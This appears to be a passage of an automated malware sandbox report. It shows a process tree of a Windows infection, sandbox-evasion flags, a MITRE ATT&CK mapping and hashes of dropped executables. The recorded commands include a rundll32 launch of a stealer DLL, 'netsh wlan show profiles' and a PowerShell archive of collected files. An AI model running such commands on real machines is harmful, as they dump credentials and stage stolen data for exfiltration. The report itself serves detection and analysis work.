                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff99c5e46f8,0x7ff99c5e4708,0x7ff99c5e4718
                                                                                                      5⤵
                                                                                                        PID:4312
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                                                                                                        5⤵
                                                                                                          PID:3728
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
                                                                                                          5⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1380
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                                                                                          5⤵
                                                                                                            PID:4292
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                                                                                                            5⤵
                                                                                                              PID:4140
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                              5⤵
                                                                                                                PID:3468
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
                                                                                                                5⤵
                                                                                                                  PID:5336
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
                                                                                                                  5⤵
                                                                                                                    PID:5588
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                                                                                                                    5⤵
                                                                                                                      PID:5920
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1
                                                                                                                      5⤵
                                                                                                                        PID:6116
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
                                                                                                                        5⤵
                                                                                                                          PID:4316
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
                                                                                                                          5⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:5484
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                          5⤵
                                                                                                                            PID:6104
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                            5⤵
                                                                                                                              PID:3068
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                                                                                                                              5⤵
                                                                                                                                PID:5832
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,46358338558532664,4493438235611314631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
                                                                                                                                5⤵
                                                                                                                                  PID:5128
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:4224
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99c5e46f8,0x7ff99c5e4708,0x7ff99c5e4718
                                                                                                                                  5⤵
                                                                                                                                    PID:2784
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,1897870201046845147,9769173505782090193,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
                                                                                                                                    5⤵
                                                                                                                                      PID:2236
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,1897870201046845147,9769173505782090193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:1616
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:5012
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99c5e46f8,0x7ff99c5e4708,0x7ff99c5e4718
                                                                                                                                      5⤵
                                                                                                                                        PID:2656
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17785048241014504766,3221478576465464485,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3
                                                                                                                                        5⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:5508
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:6084
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                    3⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:3044
                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                      4⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:4328
                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                        netsh wlan show profiles
                                                                                                                                        5⤵
                                                                                                                                          PID:5488
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\757987694264_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                          5⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5620
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                                                      3⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2772
                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:836
                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5500
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5988 -ip 5988
                                                                                                                                      1⤵
                                                                                                                                        PID:5340
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5644 -ip 5644
                                                                                                                                        1⤵
                                                                                                                                          PID:5012
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5276 -ip 5276
                                                                                                                                          1⤵
                                                                                                                                            PID:4520

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                          Execution

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Persistence

                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                          1
                                                                                                                                          T1547

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          1
                                                                                                                                          T1547.001

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Privilege Escalation

                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                          1
                                                                                                                                          T1547

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          1
                                                                                                                                          T1547.001

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Defense Evasion

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          2
                                                                                                                                          T1497

                                                                                                                                          Modify Registry

                                                                                                                                          2
                                                                                                                                          T1112

                                                                                                                                          Subvert Trust Controls

                                                                                                                                          1
                                                                                                                                          T1553

                                                                                                                                          Install Root Certificate

                                                                                                                                          1
                                                                                                                                          T1553.004

                                                                                                                                          Credential Access

                                                                                                                                          Unsecured Credentials

                                                                                                                                          5
                                                                                                                                          T1552

                                                                                                                                          Credentials In Files

                                                                                                                                          4
                                                                                                                                          T1552.001

                                                                                                                                          Credentials in Registry

                                                                                                                                          1
                                                                                                                                          T1552.002

                                                                                                                                          Discovery

                                                                                                                                          Query Registry

                                                                                                                                          6
                                                                                                                                          T1012

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          2
                                                                                                                                          T1497

                                                                                                                                          System Information Discovery

                                                                                                                                          4
                                                                                                                                          T1082

                                                                                                                                          Collection

                                                                                                                                          Data from Local System

                                                                                                                                          5
                                                                                                                                          T1005

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                            Filesize

                                                                                                                                            152B

                                                                                                                                            MD5

                                                                                                                                            1eb86108cb8f5a956fdf48efbd5d06fe

                                                                                                                                            SHA1

                                                                                                                                            7b2b299f753798e4891df2d9cbf30f94b39ef924

                                                                                                                                            SHA256

                                                                                                                                            1b53367e0041d54af89e7dd59733231f5da1393c551ed2b943c89166c0baca40

                                                                                                                                            SHA512

                                                                                                                                            e2a661437688a4a01a6eb3b2bd7979ecf96b806f5a487d39354a7f0d44cb693a3b1c2cf6b1247b04e4106cc816105e982569572042bdddb3cd5bec23b4fce29d

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                            Filesize

                                                                                                                                            152B

                                                                                                                                            MD5

                                                                                                                                            f35bb0615bb9816f562b83304e456294

                                                                                                                                            SHA1

                                                                                                                                            1049e2bd3e1bbb4cea572467d7c4a96648659cb4

                                                                                                                                            SHA256

                                                                                                                                            05e80abd624454e5b860a08f40ddf33d672c3fed319aac180b7de5754bc07b71

                                                                                                                                            SHA512

                                                                                                                                            db9100f3e324e74a9c58c7d9f50c25eaa4c6c4553c93bab9b80c6f7bef777db04111ebcd679f94015203b240fe9f4f371cae0d4290ec891a4173c746ff4b11c1

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                            Filesize

                                                                                                                                            960B

                                                                                                                                            MD5

                                                                                                                                            14be333f192b13735319567028011dee

                                                                                                                                            SHA1

                                                                                                                                            088c9cdd2a91e60d7b044b7925d2a339db406115

                                                                                                                                            SHA256

                                                                                                                                            53e38349fa4bdf4c39261cba9b17fb7ceee6d00d343479d3041c90c575bb67f3

                                                                                                                                            SHA512

                                                                                                                                            c7a1c4c54a63ef46038706109dc3e19831c5608206eb5760439439e6ddd9af3cfcf08164ac81fdd7193b7345570795ab615467c1b2a0f131948fdeb4a1ebc8e6

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                            Filesize

                                                                                                                                            6KB

                                                                                                                                            MD5

                                                                                                                                            f682e5892c6b01684a41344c27f488f2

                                                                                                                                            SHA1

                                                                                                                                            be2886852a72025344190a8f68ad43a2f2eb5919

                                                                                                                                            SHA256

                                                                                                                                            07beb62f42ae2c586c888b46ddf1eaff5c677f86d45a4aa3477f4ddc3191087a

                                                                                                                                            SHA512

                                                                                                                                            b50457cb036d8817b467ec3b3c86b68c8b5d04bc745839e6b5d18aa1670494fa3ef9bcd8cea326ac24f5dc3788c670794c8e1f8addd3d5041698835e9652a1a0

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                            Filesize

                                                                                                                                            7KB

                                                                                                                                            MD5

                                                                                                                                            71af25de062439e20c3204bf7c4dfbde

                                                                                                                                            SHA1

                                                                                                                                            ff759f087181ab80d91978a305c1d6e0dcfc8d0e

                                                                                                                                            SHA256

                                                                                                                                            a5351889d11ab7d4bd02efc05ac94dd2abe5dbf42357fc722bc6eec57cf85c73

                                                                                                                                            SHA512

                                                                                                                                            b08a77724b6d409f353cec4ebf2fc92e1dcd70fa3f36f922e5444a30b6b06f5adfdd119da4923d8dc68efad85664c730f95a2241e0463820c01a5bdc61fda81b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                                                                                                            Filesize

                                                                                                                                            707B

                                                                                                                                            MD5

                                                                                                                                            f44eb7c5b71976561a96c8df337004ff

                                                                                                                                            SHA1

                                                                                                                                            fa5e713026d943a8d966cda1ff90230ec706925e

                                                                                                                                            SHA256

                                                                                                                                            9aea80f493c58b7504ba565e1baf5ac478a85f399f18f5f5d1688b251dffb8f9

                                                                                                                                            SHA512

                                                                                                                                            bd513e7d3d48b51160eeddebc35ad3ea7e0977b0841b54c5e0136264e50bab3123be758ad033e9792e2216c38c6a42cb989c764dc30d6937601735d14e7ab402

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57a9dc.TMP
                                                                                                                                            Filesize

                                                                                                                                            707B

                                                                                                                                            MD5

                                                                                                                                            5edc994076f063f008d272b6db8fa683

                                                                                                                                            SHA1

                                                                                                                                            e0ae7c8ac6e2cfda2ac04e64c487004f956c6931

                                                                                                                                            SHA256

                                                                                                                                            1907af51432849e8459c124b574b5d5079a8cc457c876ec80534763e511b7945

                                                                                                                                            SHA512

                                                                                                                                            ce5d821174602baede2598471a8d9f9d2ff0cfa72ecdc9ebcd0a38c42b7a6d4b291dc6763e3fa32bf83e2b0c66bc2b2ff200c608bef6d06ac3ff09956da36f69

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                            Filesize

                                                                                                                                            16B

                                                                                                                                            MD5

                                                                                                                                            6752a1d65b201c13b62ea44016eb221f

                                                                                                                                            SHA1

                                                                                                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                            SHA256

                                                                                                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                            SHA512

                                                                                                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            f3e8befb0fac0f146106a3a49d26487b

                                                                                                                                            SHA1

                                                                                                                                            4a56b9795b5b99a0ad1f3beb9c6fba88b59c2f29

                                                                                                                                            SHA256

                                                                                                                                            6820db6d3ad6cc71ebb930b4fdbd313cfb8bbdb663fecc979121a7be097815b0

                                                                                                                                            SHA512

                                                                                                                                            6c9271acf73e13600ffc721bc40ec6349bb13185e681acaf8e486046ab6213d8a13f947b76e0c0beefe3ae121d712b5f50f7ca130181801f42b1c1e6b001113c

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                            Filesize

                                                                                                                                            11KB

                                                                                                                                            MD5

                                                                                                                                            2a849417f840562647aed336a06d8a56

                                                                                                                                            SHA1

                                                                                                                                            93bde8a004f4c82c8c395700226bf1cf9f420238

                                                                                                                                            SHA256

                                                                                                                                            12ed491042071810b89002b198b0cbc396af6da97f9ffd9d6a1e144da08b3051

                                                                                                                                            SHA512

                                                                                                                                            8c028c2f700d983ac018ea25c27dd8708e750bfceaab386e7bdb0c7d83eca6209aaf740047884d7a4989bc6e34d30ce5d0dea1c850122a9e2eb7bd0d7d05509c

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                            Filesize

                                                                                                                                            11KB

                                                                                                                                            MD5

                                                                                                                                            6429602e8b694d30376127af0c3de5e1

                                                                                                                                            SHA1

                                                                                                                                            115053de3ecda27fb48c933bb8e9d0d2dc021b89

                                                                                                                                            SHA256

                                                                                                                                            fd59eac5759354808b63755699c940022ce7b01f8363b21abad2bb6b23939344

                                                                                                                                            SHA512

                                                                                                                                            6fffe384ac3b3397017fb046a2a8659d02b2b180cff30fb50a9fd8580e5a5535d24819a28e17e12f514e6d245073342216080a4d60588c68716fb7111647e56c

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\fca87bc0-c3fd-4472-8725-c36bdbaeed92.tmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            bb61f6aeee869ab47875682eb40164fd

                                                                                                                                            SHA1

                                                                                                                                            0a82d39ea11f0d879197d038c998d2b73436a89e

                                                                                                                                            SHA256

                                                                                                                                            2de7103ccf137dceb7be77b14eb94cad921ff2164c9b6537ef85f355969dc618

                                                                                                                                            SHA512

                                                                                                                                            eb6e558363be2e9857954741f7d881214eb9e66d5f82a2683bd56aa2c7886f3800fc82135af9ac7a292c194c4a9276fc7d8885fe17ee77d8da41137195c5e529

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                            Filesize

                                                                                                                                            1.8MB

                                                                                                                                            MD5

                                                                                                                                            bb45d62ca3f0d3a68f82e70eb5b1f90a

                                                                                                                                            SHA1

                                                                                                                                            d078bb4bee3cadc712661d43e56f52bb3fc5a20d

                                                                                                                                            SHA256

                                                                                                                                            f8c54e5d8a702bc46f0d824ee29ca9b45a3b6c9216578b4ece911e8c57f9419d

                                                                                                                                            SHA512

                                                                                                                                            a89258b202396a1e1a3f8241118ee0094ea153fc809fef879db328e43d1a9b31bb183a5b1b881c8648f97d1e2106025ae7076ff1a7a60e99aa7bcbb9e7026e86

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000042001\20071be6d2.exe
                                                                                                                                            Filesize

                                                                                                                                            3.0MB

                                                                                                                                            MD5

                                                                                                                                            eb7de560bf4235d6726be4f9bf79d237

                                                                                                                                            SHA1

                                                                                                                                            e3040ce9afdd5f138bc386e3b5a155d0d36b040d

                                                                                                                                            SHA256

                                                                                                                                            49005f855f20cd3ed6d7b142af30f8eb229ab93ffe4e9740f8615bf5f148ee84

                                                                                                                                            SHA512

                                                                                                                                            9268f92fb31d9c1cb3976c0eb7211fafabe4e215d806cb42ea56ca0a4cee48ce8cd086886604f62fdc1404b5e051e41cb7c2bb99b3037197eb3f2bfbb79ff513

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
                                                                                                                                            Filesize

                                                                                                                                            894KB

                                                                                                                                            MD5

                                                                                                                                            2f8912af892c160c1c24c9f38a60c1ab

                                                                                                                                            SHA1

                                                                                                                                            d2deae508e262444a8f15c29ebcc7ebbe08a3fdb

                                                                                                                                            SHA256

                                                                                                                                            59ff8e0aa665fbbf749c7548906a655cb1869bb58a3b7546efa5b416d19e6308

                                                                                                                                            SHA512

                                                                                                                                            0395383bde98d358b0a7f2224f903dff026ce0c6d90feb49ac0e6993ef692143b0eb25da84d9cdc9e7b373a7b75a6dbaef14746eda1bff165d59f07ca51a16bb

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
                                                                                                                                            Filesize

                                                                                                                                            1.8MB

                                                                                                                                            MD5

                                                                                                                                            e987c0d1f94b8822546051f3c26f5642

                                                                                                                                            SHA1

                                                                                                                                            1e794dfe9466635fecbe6d56ae101ec78574612b

                                                                                                                                            SHA256

                                                                                                                                            554dd18b0e628c29403b6347705302cc346656bc26ae31d9cf811ea09534c3e6

                                                                                                                                            SHA512

                                                                                                                                            a80bb8a7890a7de141fa33bf200f097c6e6e3cf307fa34d73c37c5b9a3508e5dbd06dc289ebd5f0ed74368f2c80c0ed2e8b0d56797e89055bb3cca815d320e86

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
                                                                                                                                            Filesize

                                                                                                                                            1.7MB

                                                                                                                                            MD5

                                                                                                                                            85a15f080b09acace350ab30460c8996

                                                                                                                                            SHA1

                                                                                                                                            3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

                                                                                                                                            SHA256

                                                                                                                                            3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

